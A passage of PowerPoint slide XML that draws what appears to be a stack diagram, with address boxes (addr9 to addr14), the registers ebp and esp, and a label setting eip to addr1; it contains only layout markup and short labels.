                  </a:xfrm>
                </p:grpSpPr>
                <p:cxnSp>
                  <p:nvCxnSpPr>
                    <p:cNvPr id="280" name="Shape 640">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3EBFA795-ECE0-4D44-A4F5-4E0CFF5FB8F6}"/>
                        </a:ext>
                      </a:extLst>
                    </p:cNvPr>
                    <p:cNvCxnSpPr>
                      <a:cxnSpLocks/>
                    </p:cNvCxnSpPr>
                    <p:nvPr/>
                  </p:nvCxnSpPr>
                  <p:spPr>
                    <a:xfrm>
                      <a:off x="6974463" y="2256937"/>
                      <a:ext cx="690098" cy="0"/>
                    </a:xfrm>
                    <a:prstGeom prst="straightConnector1">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:schemeClr val="dk2"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="triangle" w="med" len="med"/>
                    </a:ln>
                  </p:spPr>
                </p:cxnSp>
                <p:sp>
                  <p:nvSpPr>
                    <p:cNvPr id="281" name="Shape 636">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{12A03319-3621-4335-B00B-333BC536A210}"/>
                        </a:ext>
                      </a:extLst>
                    </p:cNvPr>
                    <p:cNvSpPr/>
                    <p:nvPr/>
                  </p:nvSpPr>
                  <p:spPr>
                    <a:xfrm>
                      <a:off x="7052204" y="2042620"/>
                      <a:ext cx="1289321" cy="28994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000" dirty="0">
                          <a:latin typeface="Consolas"/>
                          <a:ea typeface="Consolas"/>
                          <a:cs typeface="Consolas"/>
                          <a:sym typeface="Consolas"/>
                        </a:rPr>
                        <a:t>addr9</a:t>
                      </a:r>
                      <a:endParaRPr sz="1000" dirty="0">
                        <a:latin typeface="Consolas"/>
                        <a:ea typeface="Consolas"/>
                        <a:cs typeface="Consolas"/>
                        <a:sym typeface="Consolas"/>
                      </a:endParaRPr>
                    </a:p>
                  </p:txBody>
                </p:sp>
              </p:grpSp>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="279" name="Shape 636">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{921107DF-D81E-451C-AB33-081660DBEFBD}"/>
                      </a:ext>
                    </a:extLst>
                  </p:cNvPr>
                  <p:cNvSpPr/>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr>
                  <a:xfrm>
                    <a:off x="3879865" y="3151593"/>
                    <a:ext cx="1287214" cy="306562"/>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000" dirty="0">
                        <a:latin typeface="Consolas"/>
                        <a:ea typeface="Consolas"/>
                        <a:cs typeface="Consolas"/>
                        <a:sym typeface="Consolas"/>
                      </a:rPr>
                      <a:t>addr13</a:t>
                    </a:r>
                    <a:endParaRPr sz="1000" dirty="0">
                      <a:latin typeface="Consolas"/>
                      <a:ea typeface="Consolas"/>
                      <a:cs typeface="Consolas"/>
                      <a:sym typeface="Consolas"/>
                    </a:endParaRPr>
                  </a:p>
                </p:txBody>
              </p:sp>
            </p:grpSp>
            <p:cxnSp>
              <p:nvCxnSpPr>
                <p:cNvPr id="310" name="Shape 640">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D3F0A9CE-4C12-4696-B814-60462941EF88}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvCxnSpPr>
                  <a:cxnSpLocks/>
                </p:cNvCxnSpPr>
                <p:nvPr/>
              </p:nvCxnSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="7519521" y="4920952"/>
                  <a:ext cx="690098" cy="0"/>
                </a:xfrm>
                <a:prstGeom prst="straightConnector1">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/>
                <a:ln w="9525" cap="flat" cmpd="sng">
                  <a:solidFill>
                    <a:schemeClr val="dk2"/>
                  </a:solidFill>
                  <a:prstDash val="solid"/>
                  <a:round/>
                  <a:headEnd type="none" w="med" len="med"/>
                  <a:tailEnd type="triangle" w="med" len="med"/>
                </a:ln>
              </p:spPr>
            </p:cxnSp>
          </p:grpSp>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="347" name="Shape 640">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DF6BBCBC-752A-4DD3-AD27-D74C937CC6E7}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks/>
                <a:stCxn id="304" idx="3"/>
                <a:endCxn id="286" idx="2"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm flipV="1">
                <a:off x="10137449" y="4849829"/>
                <a:ext cx="649991" cy="963705"/>
              </a:xfrm>
              <a:prstGeom prst="straightConnector1">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525" cap="flat" cmpd="sng">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:prstDash val="solid"/>
                <a:round/>
                <a:headEnd type="none" w="med" len="med"/>
                <a:tailEnd type="triangle" w="med" len="med"/>
              </a:ln>
            </p:spPr>
          </p:cxnSp>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="348" name="Shape 640">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CEE85F15-F842-4024-BC9A-610D72528DC1}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks/>
                <a:stCxn id="303" idx="3"/>
                <a:endCxn id="349" idx="1"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="10137449" y="5596970"/>
                <a:ext cx="385483" cy="519916"/>
              </a:xfrm>
              <a:prstGeom prst="straightConnector1">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525" cap="flat" cmpd="sng">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:prstDash val="solid"/>
                <a:round/>
                <a:headEnd type="none" w="med" len="med"/>
                <a:tailEnd type="triangle" w="med" len="med"/>
              </a:ln>
            </p:spPr>
          </p:cxnSp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="349" name="Shape 631">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C46059A3-0451-4EA6-AB11-8007F6E73A8D}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="10522932" y="6008704"/>
                <a:ext cx="1331940" cy="216365"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:schemeClr val="accent5">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200" b="1" dirty="0"/>
                  <a:t>eip = </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="1" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="FF0000"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>addr1</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="415" name="组合 414">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{425601D1-CE3E-4F41-B2BC-57D53D66C0F7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="7945322" y="3758980"/>
              <a:ext cx="1329554" cy="319733"/>
              <a:chOff x="6615347" y="324374"/>
              <a:chExt cx="1329554" cy="319733"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="416" name="Shape 636">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F4D5FE02-040E-4C41-AEB1-A90B07336EDF}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="6683819" y="324374"/>
                <a:ext cx="1261082" cy="319733"/>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000" dirty="0">
                    <a:latin typeface="Consolas"/>
                    <a:ea typeface="Consolas"/>
                    <a:cs typeface="Consolas"/>
                    <a:sym typeface="Consolas"/>
                  </a:rPr>
                  <a:t>addr12</a:t>
                </a:r>
                <a:endParaRPr sz="1000" dirty="0">
                  <a:latin typeface="Consolas"/>
                  <a:ea typeface="Consolas"/>
                  <a:cs typeface="Consolas"/>
                  <a:sym typeface="Consolas"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="417" name="Shape 640">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{43163E0A-7147-47D7-A935-9627A1381135}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="6615347" y="549695"/>
                <a:ext cx="674457" cy="0"/>
              </a:xfrm>
              <a:prstGeom prst="straightConnector1">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525" cap="flat" cmpd="sng">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:prstDash val="solid"/>
                <a:round/>
                <a:headEnd type="none" w="med" len="med"/>
                <a:tailEnd type="triangle" w="med" len="med"/>
              </a:ln>
            </p:spPr>
          </p:cxnSp>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="418" name="组合 417">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1458494E-1767-4036-BEAC-1E610D9E8D14}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="7952337" y="3119696"/>
              <a:ext cx="1329554" cy="328135"/>
              <a:chOff x="6615347" y="315971"/>
              <a:chExt cx="1329554" cy="328135"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="419" name="Shape 636">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{43D35A36-B749-4187-B8A1-3886F6429833}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="6669298" y="315971"/>
                <a:ext cx="1275603" cy="328135"/>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000" dirty="0">
                    <a:latin typeface="Consolas"/>
                    <a:ea typeface="Consolas"/>
                    <a:cs typeface="Consolas"/>
                    <a:sym typeface="Consolas"/>
                  </a:rPr>
                  <a:t>addr14</a:t>
                </a:r>
                <a:endParaRPr sz="1000" dirty="0">
                  <a:latin typeface="Consolas"/>
                  <a:ea typeface="Consolas"/>
                  <a:cs typeface="Consolas"/>
                  <a:sym typeface="Consolas"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="420" name="Shape 640">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E9116661-5EF3-44C2-A15A-2BA7AD820F04}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="6615347" y="549695"/>
                <a:ext cx="674457" cy="0"/>
              </a:xfrm>
              <a:prstGeom prst="straightConnector1">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525" cap="flat" cmpd="sng">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:prstDash val="solid"/>
                <a:round/>
                <a:headEnd type="none" w="med" len="med"/>
                <a:tailEnd type="triangle" w="med" len="med"/>
              </a:ln>
            </p:spPr>
          </p:cxnSp>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="436" name="组合 435">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8289DEDB-CB6B-4A91-9EDA-77F1781A2DA5}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="7955979" y="4164883"/>
              <a:ext cx="1329555" cy="334610"/>
              <a:chOff x="6615347" y="309496"/>
              <a:chExt cx="1329555" cy="334610"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="437" name="Shape 636">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F3FF0D3B-501E-4230-9EFF-78F67AA6514B}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="6668673" y="309496"/>
                <a:ext cx="1276229" cy="33461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000" dirty="0">
                    <a:latin typeface="Consolas"/>
                    <a:ea typeface="Consolas"/>
                    <a:cs typeface="Consolas"/>
                    <a:sym typeface="Consolas"/>
                  </a:rPr>
                  <a:t>addr10</a:t>
                </a:r>
                <a:endParaRPr sz="1000" dirty="0">
                  <a:latin typeface="Consolas"/>
                  <a:ea typeface="Consolas"/>
                  <a:cs typeface="Consolas"/>
                  <a:sym typeface="Consolas"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="438" name="Shape 640">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{535D50A3-63AF-4623-B154-2129D990A5A0}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="6615347" y="549695"/>
                <a:ext cx="674457" cy="0"/>
              </a:xfrm>
              <a:prstGeom prst="straightConnector1">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525" cap="flat" cmpd="sng">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:prstDash val="solid"/>
                <a:round/>
                <a:headEnd type="none" w="med" len="med"/>
                <a:tailEnd type="triangle" w="med" len="med"/>
              </a:ln>
            </p:spPr>
          </p:cxnSp>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="251" name="文本框 250">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EB11DFBC-F8A5-42A5-9424-8076BF715494}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10373064" y="3599494"/>
              <a:ext cx="538723" cy="276999"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="1" dirty="0"/>
                <a:t>赋值</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="355" name="组合 354">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5C6DF60E-102B-4460-A385-E2FB4923CDDA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8109881" y="2413999"/>
            <a:ext cx="3935550" cy="2374169"/>
            <a:chOff x="7773646" y="-29435"/>
            <a:chExt cx="4038307" cy="2538524"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="358" name="矩形 357">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0A7CA08B-FC72-4B5F-B03A-271A9232E225}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7773646" y="-29435"/>
              <a:ext cx="4038307" cy="2503706"/>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63" name="组合 362">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1ED82097-2DEE-48C2-9B45-8B1493E793BA}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="7840223" y="28807"/>
              <a:ext cx="3848185" cy="2480282"/>
              <a:chOff x="6964304" y="228815"/>
              <a:chExt cx="3780214" cy="2480282"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="447" name="Shape 640">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A94CB52D-8B7D-4932-8FEA-F0F8E55F2A0D}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="6964304" y="1098485"/>
                <a:ext cx="690098" cy="0"/>
              </a:xfrm>
              <a:prstGeom prst="straightConnector1">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525" cap="flat" cmpd="sng">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:prstDash val="solid"/>
                <a:round/>
                <a:headEnd type="none" w="med" len="med"/>
                <a:tailEnd type="triangle" w="med" len="med"/>
              </a:ln>
            </p:spPr>
          </p:cxnSp>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="448" name="组合 447">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C2B466A6-19BE-4E3E-9D0A-FBA4CD80181B}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="6964304" y="228815"/>
                <a:ext cx="3780214" cy="2480282"/>
                <a:chOff x="6964304" y="228815"/>
                <a:chExt cx="3780214" cy="2480282"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:grpSp>
              <p:nvGrpSpPr>
                <p:cNvPr id="456" name="组合 455">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1A106DC1-E2F4-4EE9-AF60-591302C4654F}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvGrpSpPr/>
                <p:nvPr/>
              </p:nvGrpSpPr>
              <p:grpSpPr>
                <a:xfrm>
                  <a:off x="6964304" y="228815"/>
                  <a:ext cx="3780214" cy="2480282"/>
                  <a:chOff x="6964304" y="228815"/>
                  <a:chExt cx="3780214" cy="3068508"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:cxnSp>
                <p:nvCxnSpPr>
                  <p:cNvPr id="458" name="Shape 640">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FB782E39-E4C4-4C8E-88E7-36D87515FC52}"/>
                      </a:ext>
                    </a:extLst>
                  </p:cNvPr>
                  <p:cNvCxnSpPr>
                    <a:cxnSpLocks/>
                  </p:cNvCxnSpPr>
                  <p:nvPr/>
                </p:nvCxnSpPr>
                <p:spPr>
                  <a:xfrm>
                    <a:off x="6964304" y="3155053"/>
                    <a:ext cx="690098" cy="0"/>
                  </a:xfrm>
                  <a:prstGeom prst="straightConnector1">
                    <a:avLst/>
                  </a:prstGeom>
                  <a:noFill/>
                  <a:ln w="9525" cap="flat" cmpd="sng">
                    <a:solidFill>
                      <a:schemeClr val="dk2"/>
                    </a:solidFill>
                    <a:prstDash val="solid"/>
                    <a:round/>
                    <a:headEnd type="none" w="med" len="med"/>
                    <a:tailEnd type="triangle" w="med" len="med"/>
                  </a:ln>
                </p:spPr>
              </p:cxnSp>
              <p:grpSp>
                <p:nvGrpSpPr>
                  <p:cNvPr id="459" name="组合 458">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A9914A59-F284-43E8-9E79-12A4048D453F}"/>
                      </a:ext>
                    </a:extLst>
                  </p:cNvPr>
                  <p:cNvGrpSpPr/>
                  <p:nvPr/>
                </p:nvGrpSpPr>
                <p:grpSpPr>
                  <a:xfrm>
                    <a:off x="6964305" y="228815"/>
                    <a:ext cx="3780213" cy="3068508"/>
                    <a:chOff x="6964305" y="228815"/>
                    <a:chExt cx="3780213" cy="3068508"/>
                  </a:xfrm>
                </p:grpSpPr>
                <p:grpSp>
                  <p:nvGrpSpPr>
                    <p:cNvPr id="460" name="组合 459">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4A176B90-0153-42EB-9330-2D65FF462743}"/>
                        </a:ext>
                      </a:extLst>
                    </p:cNvPr>
                    <p:cNvGrpSpPr/>
                    <p:nvPr/>
                  </p:nvGrpSpPr>
                  <p:grpSpPr>
                    <a:xfrm>
                      <a:off x="6964305" y="228815"/>
                      <a:ext cx="3780213" cy="2948120"/>
                      <a:chOff x="6964304" y="228815"/>
                      <a:chExt cx="3759036" cy="2948125"/>
                    </a:xfrm>
                  </p:grpSpPr>
                  <p:sp>
                    <p:nvSpPr>
                      <p:cNvPr id="464" name="Shape 631">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2CB1B2F9-ED03-41EC-8E1E-E97CAD559252}"/>
                          </a:ext>
                        </a:extLst>
                      </p:cNvPr>
                      <p:cNvSpPr/>
                      <p:nvPr/>
                    </p:nvSpPr>
                    <p:spPr>
                      <a:xfrm>
                        <a:off x="10232133" y="1294414"/>
                        <a:ext cx="491207" cy="303350"/>
                      </a:xfrm>
                      <a:prstGeom prst="rect">
                        <a:avLst/>
                      </a:prstGeom>
                      <a:solidFill>
                        <a:schemeClr val="accent5">
                          <a:lumMod val="60000"/>
                          <a:lumOff val="4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200" b="1" dirty="0" err="1"/>
                          <a:t>ebp</a:t>
                        </a:r>
                        <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200" b="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                        </a:endParaRPr>
                      </a:p>
                    </p:txBody>
                  </p:sp>
                  <p:sp>
                    <p:nvSpPr>
                      <p:cNvPr id="465" name="Shape 631">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4FDECD7B-C43A-4025-BBEC-5E61B7A2E276}"/>
                          </a:ext>
                        </a:extLst>
                      </p:cNvPr>
                      <p:cNvSpPr/>
                      <p:nvPr/>
                    </p:nvSpPr>
                    <p:spPr>
                      <a:xfrm>
                        <a:off x="10228414" y="1592957"/>
                        <a:ext cx="491207" cy="303350"/>
                      </a:xfrm>
                      <a:prstGeom prst="rect">
                        <a:avLst/>
                      </a:prstGeom>
                      <a:solidFill>
                        <a:schemeClr val="accent5">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200" b="1" dirty="0" err="1"/>
                          <a:t>esp</a:t>
                        </a:r>
                        <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200" b="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                        </a:endParaRPr>
                      </a:p>
                    </p:txBody>
                  </p:sp>
                  <p:grpSp>
                    <p:nvGrpSpPr>
                      <p:cNvPr id="466" name="组合 465">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{51700D44-79B8-41E8-B012-9A90C65C69E8}"/>
                          </a:ext>
                        </a:extLst>
                      </p:cNvPr>
                      <p:cNvGrpSpPr/>
                      <p:nvPr/>
                    </p:nvGrpSpPr>
                    <p:grpSpPr>
                      <a:xfrm>
                        <a:off x="6964304" y="228815"/>
                        <a:ext cx="2390724" cy="2948125"/>
                        <a:chOff x="6964304" y="228815"/>
                        <a:chExt cx="2390724" cy="2948125"/>
                      </a:xfrm>
                    </p:grpSpPr>
                    <p:cxnSp>
                      <p:nvCxnSpPr>
                        <p:cNvPr id="469" name="Shape 640">
                          <a:extLst>
                            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BEA59772-8F1A-4B62-8E73-33884652E229}"/>
                            </a:ext>
                          </a:extLst>
                        </p:cNvPr>
                        <p:cNvCxnSpPr>
                          <a:cxnSpLocks/>
                        </p:cNvCxnSpPr>
                        <p:nvPr/>
                      </p:nvCxnSpPr>
                      <p:spPr>
                        <a:xfrm>
                          <a:off x="6964304" y="770259"/>
                          <a:ext cx="686232" cy="0"/>
                        </a:xfrm>
                        <a:prstGeom prst="straightConnector1">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:noFill/>
                        <a:ln w="9525" cap="flat" cmpd="sng">
                          <a:solidFill>
                            <a:schemeClr val="dk2"/>
                          </a:solidFill>
                          <a:prstDash val="solid"/>
                          <a:round/>
                          <a:headEnd type="none" w="med" len="med"/>
                          <a:tailEnd type="triangle" w="med" len="med"/>
                        </a:ln>
                      </p:spPr>
                    </p:cxnSp>
                    <p:cxnSp>
